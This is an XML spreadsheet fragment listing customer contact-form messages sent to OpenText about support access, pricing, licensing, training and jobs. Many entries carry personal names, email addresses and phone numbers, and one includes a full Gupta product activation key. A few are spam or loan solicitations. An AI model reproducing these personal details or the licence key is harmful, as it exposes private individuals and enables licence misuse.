    <t>I applied to a job online with your company and I wanted to make sure you have my resume in your system.  It says my email is registered, however, I cannot signin to check and the forget password function is not sending me an email.  I would appreciate it if someone can check.  My email is Craddatz@comcast.net and I am applying for the Senior Manager IT position in Tinton Falls, NJ _x000D_
_x000D_
Thank you - Chris Raddatz</t>
  </si>
  <si>
    <t>Bussiness partner</t>
  </si>
  <si>
    <t>job</t>
  </si>
  <si>
    <t>need information</t>
  </si>
  <si>
    <t>We received an invoice for 6 cents. I don't see that we've used the service 2012 and the number shown is not recognized as one of our companies phone numbers. This is for account number 784909, invoice number 1812784909. Is there anything that can be done to credit this or cancel the invoice?</t>
  </si>
  <si>
    <t>Re-seller Price Required for EDR Solution</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are trying to reset the password to our account, but are not sure where the email to change went. Can you please help us? We've had a lot of change recently so want to make sure it didn't go to someone who is no longer here. Network ID: R6556_x000D_
_x000D_
Thank you,_x000D_
Alex </t>
  </si>
  <si>
    <t>Hi I would like more information on Firstclass and cost breakdowns.</t>
  </si>
  <si>
    <t>Overview of products</t>
  </si>
  <si>
    <t>Inquiring if there is an OpenText 5-0161 Consultant Certification Bootcamp scheduled in Ottawa or another location in North America in 2019._x000D_
_x000D_
Looking to register one or more Consultants from Deloitte.</t>
  </si>
  <si>
    <t>To Establish an ECM office Solution for the office of the Head of Civil service of the Federation and some other Ministries in Nigeria</t>
  </si>
  <si>
    <t>Checking why I am getting a message that Verizon Wireless is not eligible for support? We have had a license with OpenText/HP/Exstream for over 15 years.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a job </t>
  </si>
  <si>
    <t>Hello,_x000D_
I work for FAURECIA and I want to have access to the customer support :_x000D_
account name is "Faurecia Services Groupe"_x000D_
Could you please open my access to Opentext support for Content Server 16.2 + Archive _x000D_
Center ) ?_x000D_
Thanks_x000D_
Best regards_x000D_
Romeo</t>
  </si>
  <si>
    <t>Im not able to access My Support with my account. I was able to access it some time ago._x000D_
Could You please suport ?</t>
  </si>
  <si>
    <t>Hello, please open for me access to My Support and knowledgebase. Customer ID is EU0153109.</t>
  </si>
  <si>
    <t>Hi, We are a video production and marketing company. We are exploring options to offer our clients white-labeled video asset management solution and production workflow suite. Want to explore the possibilities._x000D_
Thanks_x000D_
Roshan</t>
  </si>
  <si>
    <t>How much is encase forensic.</t>
  </si>
  <si>
    <t>EE</t>
  </si>
  <si>
    <t xml:space="preserve">Product price </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am writing to ask for some information regarding your Rightfax Express and Rightfax Cloud solution. We are a developing company that has clients using rightfax with our software and we are looking to build a test environment with your solution. We rarely have the need to test with your solution but we do have have to cover some cases. _x000D_
_x000D_
We would be very interested in the pricing of said solutions and also if you have solutions oriented for sporadic use (I thought the cloud solution might fit this scenario) to know what suits us best. Could you please explain the details of how the licesing works and the pricing._x000D_
_x000D_
Thanks for you time._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
_x000D_
can you Please share Recostar 7.8 supported Windows OS version in detail._x000D_
_x000D_
Thanks,_x000D_
Priya Shah</t>
  </si>
  <si>
    <t>Service its not gud guys</t>
  </si>
  <si>
    <t>Hello, _x000D_
 _x000D_
  I have registered to My Support on OpenText as a consultant at BCSolutions Three days ago, but I still do not have access. _x000D_
      Could you please assist. _x000D_
Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear team, _x000D_
I work for Vero Screening, we conduct pre-employment checks._x000D_
_x000D_
One of our Candidates advised that was awarded an EnCase Certified Examiner (EnCE)  qualification and we would like to verify this information._x000D_
_x000D_
Could you provide an email address that I can send qualification verification request to?_x000D_
_x000D_
Many thanks,_x000D_
</t>
  </si>
  <si>
    <t>I just leave</t>
  </si>
  <si>
    <t>This is a waste of time and energy. It is also false advertising in which i should sue. You send false emails stating that a loan is available for someone who is in need of one just to put them through the same process or same people that denied it in the first place</t>
  </si>
  <si>
    <t>Please can you send me the agenda for the training in Vienna? Including times so I can manage a diary conflict. Thanks Jade</t>
  </si>
  <si>
    <t>Hi, is it possible to get information about which sessions that are planned in Vienna 12-14. March.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Currently, we are in the process of proposing OpenText VIM Solution to one our Customer. Proposed to implement only VIM Solution with below-listed components._x000D_
•	SAP S/4 HANA 1511 (Already live environment)._x000D_
•	Archive Center 16.2_x000D_
•	Archiving &amp; Document Access 16.2.4_x000D_
•	Business Center Capture 16.5_x000D_
•	Business Center 16.3.2_x000D_
•	Vendor Invoice Management 7.5 SP8_x000D_
_x000D_
Customer not interested to implement “Extended ECM for SAP Solutions Ver. 16.2.4”._x000D_
_x000D_
Is customer interested to know, above proposed OpenText VIM &amp; Archiving solution compliance with “Singapore Electronic Evidence Act”?_x000D_
_x000D_
Can you please clarify on the above doubt or guide us to reach out to the right person in OpenText Singapore to clarify on the same. _x000D_
_x000D_
Thanks a lot for your support._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Pari_x000D_
Ph: +65-91277135</t>
  </si>
  <si>
    <t>Our Customer Standard Chartered Sri Lanka Bank needs to renew RightFAX support. We used to get it through India, company called  "Squire One". They do not respond this time neither take calls. Guide us for a active partner to renew the support.</t>
  </si>
  <si>
    <t>Dear sir/mam_x000D_
_x000D_
My name is Tejaswini Channe. I’m a Master’s degree holder in Computer Science class of 2014 Things worked out such that I got married soon after completing my masters and today I’m a proud mum of a 2 year old babygirl and a proud wife of a caring husband._x000D_
_x000D_
I consciously held back on the professional front so far to fulfill my personal wishes and responsibilities at home. I believe now I’m in a position to do justice to my education and really give my 100% to the demanding responsibilities of being a modern day IT professional._x000D_
_x000D_
I reach out to you in the hope of working with your company. I Googled you before reaching out, studied your website and have a general idea of the work that I would be expected to perform. I am also attaching my resume for your ready referral._x000D_
_x000D_
Thanks and regards_x000D_
Tejaswini_x000D_
9764272199</t>
  </si>
  <si>
    <t>I am reaching out for a renewal request on behalf of my federal customer, Raytheon Company. The program that I support is looking to renew its Permissions Manager maintenance. Can you please provide a renewal contact? Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">1) we would like to do all your delivery services you may require small or medium_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I'm considering a purchase request for a TX-1 and as part of the approval process some questions have come up. _x000D_
_x000D_
-What type of storage, if any, is used on the TX-1 during data transfer?_x000D_
-If the imaging process is interrupted does the TX-1 store any data? If so, can it be encrypted?_x000D_
-Is there any option for Bitlocker or equivalent?_x000D_
-Raytheon company deals with government projects and in the event the TX-1 is inadvertently exposed to classified information, is there a means to replace the internal storage or wipe/re-image it? </t>
  </si>
  <si>
    <t>I would like to have the software compatible with my dongle ID. Could you please help me? Regards.</t>
  </si>
  <si>
    <t>Hi -- we are a current Rightfax customer considering Rightfax Connect.   Can you tell me if the Rightfax Connect service (data center) is FedRAMP certified?   Thank you</t>
  </si>
  <si>
    <t>See OpenText Ticket#4074667 = Needs RightFax Developer Support for troubleshooting performance issue when using the RightFax Web Services API.  Customer needs to be contacted by developer support for troubleshooting this  API  issue.</t>
  </si>
  <si>
    <t>What is the latest version of RightFax ? the 10.6 version is buggy and we need an upgrade that works</t>
  </si>
  <si>
    <t>Questions for editing within the catalogue</t>
  </si>
  <si>
    <t>I have an IT Professional student who will begin his 400 hour internship on March 11, and I'm wondering who I can contact about discussing our program and setting up internship interviews.  We regularly have ITP and ITA students seeking internship sites in the Waterloo Region, and I'd love to develop a partnership with your Waterloo office. _x000D_
Thank you, and I look forward to hearing from you,_x000D_
Leslie Huys</t>
  </si>
  <si>
    <t xml:space="preserve">upgrade from desktop edi  to trusted link for windows_x000D_
need a rush call-back_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sales,_x000D_
_x000D_
As you may know, SYNNEX Corp. is a North American IT distribution company, supplying hardware and software vendors to reseller customers and not directly to end users. _x000D_
_x000D_
May I request a quote for the following? Please advise if you offer distribution/reseller discounts._x000D_
_x000D_
Product: OpenText RightFax _x000D_
Qty: 1_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
_x000D_
Devyn Upton_x000D_
Product Management,Strategic Procurement _x000D_
Weirdware_x000D_
SYNNEX Corporation _x000D_
Telephone: 864-349-4272 |   Email: DevynU@synnex.com_x000D_
</t>
  </si>
  <si>
    <t>Price Quote for Opentext Rightfax 10.6 Feature Pack (FP) 2 Service Release (SR) 2.  As well as answer questions on the product.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I've been trying to contact our account managers Rini (rinip@opentext.com)  and Milan (mward@opentext.com) for over a month with no success._x000D_
We need to assign some of our licenses to one of our affiliated companies and no response has been received. We are also looking to expand our relationship but nothing seems to capture their attention._x000D_
_x000D_
Our contract number is 0012015732, please reach our to me at cesar.costa@altisource.com asap. _x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I have some questions regarding the T8U forensic bridge.  I would like to speak to someone about our use case and see if the data passing across the bridge is ever stored on the bridge (volatility statement would be helpful)._x000D_
Thank You,</t>
  </si>
  <si>
    <t>I need information regarding the Risk Management course, requirements and the process of application.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in the 1 year subscription for Exstream classes, certification. </t>
  </si>
  <si>
    <t xml:space="preserve">LIT enables private cloud providers to deliver infrastructure as-a-service with pay-as-you-go consumption, and early termination flexibility, all while remaining vendor agnostic. In summary, LIT gives private cloud infrastructure with some of the popular characteristics of public cloud. </t>
  </si>
  <si>
    <t>Hello, I wanted to find out about your co-op program for HR students and if there are any positions available. I would love to apply to OpenText and be part of a growing and learning team to enhance my learning._x000D_
Thank you. I look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Sameer Javed</t>
  </si>
  <si>
    <t>Hi team : we want access to knowledge center DB.</t>
  </si>
  <si>
    <t>The Strategic Communications department is interested in purchasing a Digital Asset Management tool. I would like to schedule a demonstration with your team to find out more information. I am also interested in standard educational pricing or ballpark estimates that I can provide to the team to ensure that your solution fits within their budget. Please follow up with via email at briwilliams@lsu.edu_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Bri Williams</t>
  </si>
  <si>
    <t>test only</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
In 2017, LU purchased EnCase.  We are currently rebuilding the system for EnCase which requires the downloaded software.  Is it possible for LU to receive a copy of EnCase v8, which was purchased in 2018._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Mike Hines</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I wanted to contact your Waterloo office regarding the job application I made for the account development representative and the customer service renewals specialist positions. I haven't heard back from you since I applied around two weeks ago._x000D_
I am very interested in working for opentext, so I was wondering if the recruitment department had gone through my application yet._x000D_
_x000D_
I would appreciate any sort of feedback._x000D_
_x000D_
Thank you very much,</t>
  </si>
  <si>
    <t>Support assistance</t>
  </si>
  <si>
    <t>vfhkh</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have a teacher with an email issue we have not been able to solve.  We have updated her to the latest client but there must be a setting or preference that carries over.  For everyone else in the district, when you open you mailbox, it opens in a new window so you can toggle back and forth between her desktop and mailbox.  Her mailbox opens in the same window as the desktop and there is no feature to go back to desktop so she has to close her email and login again to get to the desktop.  I know there is a different view with split screen that may get around this issue but she wont use it.  Is there a setting that we are missing?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Interested in quick demo of Capital Projects Express or LEAP.</t>
  </si>
  <si>
    <t>SAP OSS Incident 619935 / 2018 Error TAX Credit Memo VIM NON PO_x000D_
We need user for accesing this url tp://mimage.opentext.com/support/ecm/secure/patches/vim/ci/7.5/sp07/vim_75_sp07_vimi-19469_ci-56_v1.pdf</t>
  </si>
  <si>
    <t>PGi (formerly Premiere Global Services) and Xpedite/Easylink/Open Text used to be sister companies. PGi has conferencing and collaboration services and Easylink had all the fax services. Our support teams are receiving very disturbed and even threatening calls from people regarding a number 7325423012 that is showing as caller ID and owner when googled as PGi but when dialed is answered as an "OPTOUT" for a fax number._x000D_
_x000D_
Can someone please contact me to see what we can do to especially get 9149465644 out of range of being contacted immediately as they are threatening violence if the faxes do not stop.</t>
  </si>
  <si>
    <t>I have an employee who registered for a class and we paid, but the class was not taken yet.  Can we reactivate their registration or apply the payment towards a new class as it was paid already?</t>
  </si>
  <si>
    <t>Hi,my name is Pablo I'm a business facilitator at Cided (Montreal) working in business developpment. We are looking to go to the RSA show in march (San Francisco) in order to meet canadian companies working in cyber security for the state of Maryland. I would like to know which representative of your company will be at the show to discuss the possibility of a meeting. Best regards, Pablo</t>
  </si>
  <si>
    <t>I need an Annotate Brava License for  old license 400430 and I can get you the MAC address as well if you need it.  But the License needs to be for Annotate.  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Support-Team,_x000D_
the activation is also after reinstall nit working. Can you send me a working one._x000D_
Thanks and Regards_x000D_
Michael Müller_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 Dear Michael Müller,_x000D_
_x000D_
Thank you for your Gupta Team Developer registration request for the following Product Media Code (PMC) and Product Activation Code (PAC): _x000D_
_x000D_
Product Media Code: 4d8690c9-02a5db4a-ccb5edc3-bd3dd131_x000D_
Product Activation Code: CFA0B0C7-BD341BBE-83E9794F-6E5C7D51_x000D_
_x000D_
Product Name: Team Developer_x000D_
Product Version: 3.1.00_x000D_
_x000D_
Please use the following Product Activation Key (PAK) to activate your Gupta software:_x000D_
Product Activation Key: AEE8ADCC1251F7A829A2A01C6C0A3FA6_x000D_
_x000D_
For more information on Gupta Team Developer, please click here._x000D_
_x000D_
For Online Technical Resources, please click here. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-- _x000D_
</t>
  </si>
  <si>
    <t>My company already has an account with OpenText and would like to add another supplier.  Please advise.</t>
  </si>
  <si>
    <t>I am working on a forensic case. I need to know that; is it possible to recover a timestamp of a file if it is changed previously. I mean; some programs can change the create, modification, acces date of a file. Can your program find out the original dates of that file? Or is there a way to find out the original dates of a file which has a changed timestamps?_x000D_
Please let me know? According to your answers I will give my academic advice to the Justice Ministry.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon_x000D_
_x000D_
I am contacting you regarding your Imagelink Application Services for CICS product. We are currently running version 2.00 within our mainframe CICS estate and are about to commence upgrading from CICS Transaction Server v5.2 to v5.4. Please can you confirm that Imagelink Application Services for CICS 2.00 is fully compatible with CICS Transaction Server v5.4. If it is not fully compatible, please advise what maintenance we may need to apply to Imagelink Application Services for CICS, or what version we may need to upgrade-to. _x000D_
_x000D_
I look forward to your soonest response. Many thanks._x000D_
</t>
  </si>
  <si>
    <t>regards to sponsorship on training 300 student in an area</t>
  </si>
  <si>
    <t>Business funding enquiry</t>
  </si>
  <si>
    <t>I cannot set my password in the support system, have tried to request for a new password, that does not work either.</t>
  </si>
  <si>
    <t>I need logins for the Best Buy account. I took over as the account manager.</t>
  </si>
  <si>
    <t>i support BNP Paribas with software interfacing with AXS-One and would like to download any documentation for AXS-One_x000D_
is it possible to get access so i can download documentation particularly how to read data from AXS-One programmatically.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - I'm trying to configure xECM Content server for Office online; there is one require field "Office Online Broker" which states I need to contact OpenText rep for URL, please see attached.  We purchased xECM from SAP.  Current CS version: 16.2.6 .  Please advise the URL, or next steps to take. </t>
  </si>
  <si>
    <t>change name suppliuer</t>
  </si>
  <si>
    <t>Dear team_x000D_
_x000D_
I would like to find out possibilities and fuction of Open text system in Softlayer or possibly in SAP cloud</t>
  </si>
  <si>
    <t>Support for installation..._x000D_
We have the need to get centura 3.1 working but I can not get a license code anymore via the website. We have used SQLWindows 4.x and up and centura 2.0, 3.0, 3.1 and even a version further. _x000D_
But I can not get this stuff registered anymore. I had to move the software to my WIndows 7 machine and I cant get it working with the link no longer working. _x000D_
Where can I get the PMC key? I cant update to PTF4 from centura 3.1_x000D_
_x000D_
I hope I can get some feedback.._x000D_
_x000D_
Mike Dijkema</t>
  </si>
  <si>
    <t xml:space="preserve">This message is for Kristine Joy Dadufaza (apac-renewals@opentext.com)_x000D_
Ref: #RC389024_x000D_
Hi,_x000D_
I received your invoice today.  As I am new to the company I would like to know if we have a contract with you and if so could you forward it to me at vmurray@tormeys.ie.  The existing staff that you have been dealing with has left the company.  Can you let me know what sign in access I have also?_x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Veronica. _x000D_
</t>
  </si>
  <si>
    <t>I've created a reactor that is self sufficient for energy it's not hydro, water, or solar. No fuel nor oil needed.</t>
  </si>
  <si>
    <t>Please, contact us. We've a question about invoices._x000D_
Best ragard,_x000D_
C. Wanders</t>
  </si>
  <si>
    <t>We are using Open Text Archiving Server.  I want to understand OT2 and  can we use it to replace OTAS.  Can you provide me some kind of demo.</t>
  </si>
  <si>
    <t>Hi We recently bought the Brava Desktop CXL but i have noticed that when we save a marked up DWG and try to re-open it there is a message that says we do not have the licence to open the file? could you please advise us on this, Kind Regards James Rooney</t>
  </si>
  <si>
    <t>I need to establish the support status of Exstream version 8.0 and the roadmap for later products</t>
  </si>
  <si>
    <t>hello, I try to access since 1 week to the partner support, but each time, I have an issue : No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
My company is partner : name ; Aerow , with End-User Code: EU0026698_x000D_
Could you please let me access.?_x000D_
thanks a lot</t>
  </si>
  <si>
    <t xml:space="preserve">"Hi_x000D_
_x000D_
Hope this email finds you well._x000D_
_x000D_
What would a huge increase in relevant traffic mean for your business? If I could greatly increase the number of customers who are interested in your products and services, wouldn't you be interested?_x000D_
_x000D_
Thank you"_x000D_
</t>
  </si>
  <si>
    <t>Looking for DMS Solution (Documentum) duly integrated with SAP ECC ver 6</t>
  </si>
  <si>
    <t>We purchased the EnCase software for e-discovery investigation for our customers. I have a master's degree in Cyber Security, with a concentration in Forensics. I am also getting my SANS 508 Advanced Digital Forensics and Incident Response training this year. However, I still feel the need to get the most out of your software. I would like to know how much it would cost to get EnCase certified. Thank you. -Jason</t>
  </si>
  <si>
    <t>Need to activate my login (mitesh.kothari@lntinfotech.com) with opentext knowledge base</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Rahmen der Ablösung unseres Output Management Systems führen wir aktuell eine Marktrecherche durch und sind dabei auf Ihr Produkt „OpenText Exstream“ gestoßen. _x000D_
Zum Zwecke einer ersten Evaluierung bezüglich der Rahmenbedingungen sowie der funktionalen Abdeckung bitten wir Sie, uns weitere Informationen zu Ihrem Produkt in deutscher Sprache (z.B. Datenblätter) zukommen zulassen sowie einen kurzen Fragenkatalog auszufüllen. Diesbezüglich würden wir uns über die Kontaktinformationen der verantwortlichen Personen freuen.</t>
  </si>
  <si>
    <t>We are interested with your EnCase Endpoint Security and Encase Endpoint Forensic products and we would like to know if you are open for distribution partnership here in the Philippines.</t>
  </si>
  <si>
    <t>I would like to engage your company for seeking support to participate in Govt. tenders.</t>
  </si>
  <si>
    <t>Dear Sir or Madam, _x000D_
please contact me on my email address. We need some documents from you for our supplier master data. We will explain everything via email._x000D_
_x000D_
Thank you very much. _x000D_
_x000D_
Best regards_x000D_
Aleksandar Angelovski</t>
  </si>
  <si>
    <t>I have been processing a case for 2 days and a few hours ago encase software says the dongle has been removed yet it is still plugged in. I cannot restart the software because that would meet I start the processing afresh. Kindly advise whether there is a way to load the dongle without restarting the EnCase software.</t>
  </si>
  <si>
    <t>Hi, i've click the confirmation mail but don't still have access to "MySupport". I've tries 3 times but don't work. Could you active my account dionneh@free.fr ? Thanks, best regards</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir nutzen seit vielen Jahren den Report Builder 6.0 von Gupta. Da Sie wahrscheinlich der Rechtsnachfolger sind, wende ich mich an Sie._x000D_
Wir möchten einen RichText mit Tabellen einfügen. Leider wird der Hintergrund der Tabelle im Report immer Blau angezeigt. Wie können wir das verhindern? Liegt hier vielleicht ein Softwarefehler vor?_x000D_
_x000D_
Beispiel RTF Dokument: _x000D_
{\rtf1\ansi\deff0_x000D_
\trowd_x000D_
\cellx1000_x000D_
\cellx2000_x000D_
\cellx3000_x000D_
cell 1\intbl\cell_x000D_
cell 2\intbl\cell_x000D_
cell 3\intbl\cell_x000D_
\row_x000D_
}_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Andre Rudolph_x000D_
AWV Ostthüringen</t>
  </si>
  <si>
    <t>How could I contact you or send my CV without system errors....?_x000D_
Von: &lt;postmaster@opentext.net&gt;_x000D_
Datum: 24. Januar 2019 um 07:25:57 MEZ_x000D_
An: &lt;florian.sollinger@yahoo.de&gt;_x000D_
Betreff: Undeliverable: [EXTERNAL] - Ref#: 20803 Support Renewal Specialist_x000D_
_x000D_
Delivery has failed to these recipients or groups:_x000D_
_x000D_
recruiting@opentext.com_x000D_
The e-mail address you entered couldn't be found._x000D_
_x000D_
Von: Florian Sollinger &lt;florian.sollinger@yahoo.de&gt;_x000D_
Datum: 24. Januar 2019 um 07:12:31 MEZ_x000D_
An: &lt;recruiting@opentext.com&gt;_x000D_
Betreff: Ref#: 20803 Support Renewal Specialist_x000D_
Antwort an: Florian Sollinger &lt;florian.sollinger@yahoo.de&gt;_x000D_
_x000D_
Good Morning recruiting team,_x000D_
_x000D_
I found for this position two Ref#:_x000D_
_x000D_
Support Renewals Specialist _x000D_
_x000D_
Germany, Grasbrunn _x000D_
_x000D_
Function: Technical Support_x000D_
_x000D_
Ref#: 21535  Created: 29-Nov-2018 _x000D_
_x000D_
_x000D_
Support Renewal Specialist _x000D_
_x000D_
Germany, Grasbrunn _x000D_
_x000D_
Function: Technical Support_x000D_
_x000D_
Ref#: 20803  Created: 4-Oct-2018 _x000D_
_x000D_
_x000D_
But I tried it yesterday to send my application a few times over the LinkedIn usage and I´m still not sure if the process was finished, because I got a stystem error message:  Internal server error_x000D_
Oops... The server encountered an error while trying to display the page you requested. Please contact our Technical Support team._x000D_
_x000D_
This morning I tried it over the "Sign In" way, but I got the message: Email Address *  There are people with this information in the system_x000D_
_x000D_
_x000D_
I got also no confirmation and through that I send you my CV over this way and an other question would be, cause I live in the west-side of Munich and the office is outside in the East of Munich, if this position contains a Home-Office possibility or a rule?_x000D_
_x000D_
_x000D_
Best regards,_x000D_
Florian Sollinger_x000D_
_x000D_
82140 Olching_x000D_
+ 49 1795943385</t>
  </si>
  <si>
    <t>Good</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I want to see what is the Fax over IP solution OpenText has, and how it can be implemented in our organization. </t>
  </si>
  <si>
    <t>Requesting for a demo to evaluate the CEM and to know how it could be integrated with our websites.</t>
  </si>
  <si>
    <t>Djhdhdjdjs</t>
  </si>
  <si>
    <t>Dear, As the opentext service provider for the EIB, Unisystem wants to organize multiple in house training sessions, we require a contact name from OpenText Europe who could assist us on this matter.</t>
  </si>
  <si>
    <t>Requirement for quotation within Software bidding in one of the biggest Oil&amp;Gas company in Kazakhstan.</t>
  </si>
  <si>
    <t>OEM License</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are from FTI Consulting. Our Encase SMS licenses (ref Dongle IDs listed in below) have been expired and sure that all should have been renewed. However, we are unable to login to the OpenText page to download the new licenses (please see below screen shot). Our registered account is "esip-asia@fticonsulting". Could you please help to resolve this ASAP as we have urgent project need to use Encase. We had also send email via the portal couple of times raising the same issue, but receive no response at all. Thank you very much!  _x000D_
_x000D_
_x000D_
_x000D_
Dongle ID_x000D_
_x000D_
G2002040425_x000D_
G2002040426_x000D_
G2002040427_x000D_
G2002040428_x000D_
G2002040429_x000D_
G2002040436_x000D_
G2002040437_x000D_
G2002040439_x000D_
G2002085806</t>
  </si>
  <si>
    <t>I would like to know why I am being charged $7.95/mo on my credit card.  I do not know what this is for and would like some type of an explanation before I dispute the charges</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I would like more information on your Audience Analysis software for digital signage. I would like to know the following:_x000D_
_x000D_
-	Data collected_x000D_
-       Options available_x000D_
-	How often reports are issued_x000D_
-	Can reports be compiled for multiple campaigns running at the same time_x000D_
-	Software costs_x000D_
-	Maintenance cost_x000D_
-	Any additional hardware_x000D_
-	Installation time _x000D_
-	Installation cost_x000D_
-	Realtime access_x000D_
_x000D_
If you can get back to me with this information I would really appreciate it._x000D_
</t>
  </si>
  <si>
    <t>Hi Guys, I will be in Toronto over the weekend of 2/3 March and wondered if it was possible to have a meeting with a knowledgable person from your team to assess your product. We are looking for an EIM solution and whilst you have a Sydney team would rather understand the organisation capabilities than a satellite remote office._x000D_
_x000D_
Kind regards_x000D_
_x000D_
Andre</t>
  </si>
  <si>
    <t>Hello, we were using a version of the Actuate Birt Report viewer and didn't realize that it has an expiration date of 01/22/2019. Is there something that we can do about this? Thanks.</t>
  </si>
  <si>
    <t>We need to gain access to the RightFax Client Installer. We already have RightFax 10.6 Feature Pack 3, SR 6 SERVER Install Media. But we need to download the standalone client installer for the same RightFax 10.6 Feature Pack 3 SR6 media. _x000D_
_x000D_
How can we download the client installer? _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Robert</t>
  </si>
  <si>
    <t>One of our clients requires EnCase Forensic 8.08 as per the following details:_x000D_
1. With one year License_x000D_
2. With 5 years License_x000D_
3. Online Training_x000D_
4. Training at OEM Premises_x000D_
5. Training at End User Premises_x000D_
 _x000D_
Kindly provide a Quote in light of the above, please._x000D_
Looking forward for a favorable response._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>I am a previous employee looking to verify employment from 2007 - 2014. Would you please provide me an email verification or point me in the correct direction for human resources?</t>
  </si>
  <si>
    <t>Request for training</t>
  </si>
  <si>
    <t>would like to pay a bill online if possible</t>
  </si>
  <si>
    <t>Unable to silently install RightFax 16 as per instructions. When I execute the install of the postscript driver, I'm always prompted that the driver doesn't have a valid signature. Getting the message (from setupapi.dev.log):_x000D_
!    sig:                Error 0x800b0109: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider._x000D_
_x000D_
Is there an updated driver with a valid cert?</t>
  </si>
  <si>
    <t>The company is looking for implement a CMP, as part of paperless process definition, do you have local (in Mexico) partners to help us with this using OpenText?</t>
  </si>
  <si>
    <t>Good afternoon.  I'm trying to determine who our account rep is so that I can speak to them about OpenText Media Management options - e.g. OT MMOD_x000D_
Please contact me on the phone # or email listed here.   _x000D_
Note, I've also been in contact with Israel Orais through the North American sales line but have not heard back from anyone.</t>
  </si>
  <si>
    <t>We are currently a RightFax customer, would like to get pricing on the RightFax cloud.</t>
  </si>
  <si>
    <t xml:space="preserve">Researching a replacement to our on-prem RightFax 10 environment and was hoping to get in touch with our sales rep to setup a demo and discuss hybrid options. </t>
  </si>
  <si>
    <t xml:space="preserve">NEED HELP TO LOGIN </t>
  </si>
  <si>
    <t xml:space="preserve">I haven't updated my EnCase in quite a while. Where do I go to download the most recent version of EnCase Forensic? </t>
  </si>
  <si>
    <t>Pricing for OpenText Exceed TurboX license to connect to SLES 12. Less than 5 concurrent connections required.</t>
  </si>
  <si>
    <t>Dear all,_x000D_
 my profile in the OpenText website is still not enabled to download Exceed software from "My Support"._x000D_
We have paid an order (Delivery Number: 8000035788, PO Number: 2000428309_2018) having Electronic ship, but I cannot perform the download._x000D_
Can you help us, please?_x000D_
Thank you._x000D_
Best regards,_x000D_
P.Cavagna</t>
  </si>
  <si>
    <t>Apply for job</t>
  </si>
  <si>
    <t>Want for job</t>
  </si>
  <si>
    <t>Although I have an account created at Open Text, I still don t have acces to My Support Field? And I really need to download EnCase Imager. Solutions?</t>
  </si>
  <si>
    <t>Please provide access to Enterprise portal and customer support pages also for Lucie.Szabo@innogy.com_x000D_
Thanks</t>
  </si>
  <si>
    <t>SEB is a Massachusetts based housing and real estate consulting firm. One of our primary activities is managing the 40B Affordable Housing permit process. This is a time consuming process that involves a large amount of unstructured data. We are currently researching software solutions that would help streamline and automate parts of our workflow._x000D_
_x000D_
Please let me know your availability for a call so that I can explain our specific needs and get a demo of your software.</t>
  </si>
  <si>
    <t xml:space="preserve">you have a bunch of unclaimed listings on our site and I want to talk about your company claiming them and driving more prospects to your site. </t>
  </si>
  <si>
    <t>Cannot login</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have an administrator account for McLarens Young International (ben.poulter@mclarens.com), I need to set a user up on our organization who is based in the UK however we only appear to have (+1) US area code fax numbers available to select, I need a (+44) UK 01245 (Chelmsford area number) phone number adding to our organization so that I can assign it to the UK user. Is this something I can organize through you?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Ben Poulter</t>
  </si>
  <si>
    <t>Louisiana Community and Technical College System would like to take advantage of the OpenText AX Licensing Changes (no license charge for Web Services).  We are presently licensed for the following AX products, and have been paying maintenance on these products through Ellucian._x000D_
•	AX Test Bundle_x000D_
•	AX WebXtender Unlimited Concurrent Users_x000D_
•	AX Desktop Access Unlimited Concurrent Users._x000D_
_x000D_
Since Ellucian has been unable to offer us Web Services for no charge, we would like to immediately get the license keys for all of our products and those in the license changes through you.  We are willing to transfer our current licensed products from Ellucian, if necessary._x000D_
_x000D_
How might we get this done quickly?</t>
  </si>
  <si>
    <t>Need Catalog for Saks Fifth Avenue, Where can I make application and get catalog from you GXS ?</t>
  </si>
  <si>
    <t>i have tried to buy opentext Brava Desktop CXL but when i try to register to pay it does not give me the option of United Kingdom, can i not buy this product for the UK</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
I represent an investment company working on financing realistic and  profitable projects that buys our interest via soft loan of about 3.5%  ROI for duration of 5-10 years depending on the project feasibility and  renewable tenure applies. _x000D_
_x000D_
You can always drop me an email if you have any questions or you'd like to receive further information about our lending service. Your positive response in your earliest convenience will be highly valued. _x000D_
_x000D_
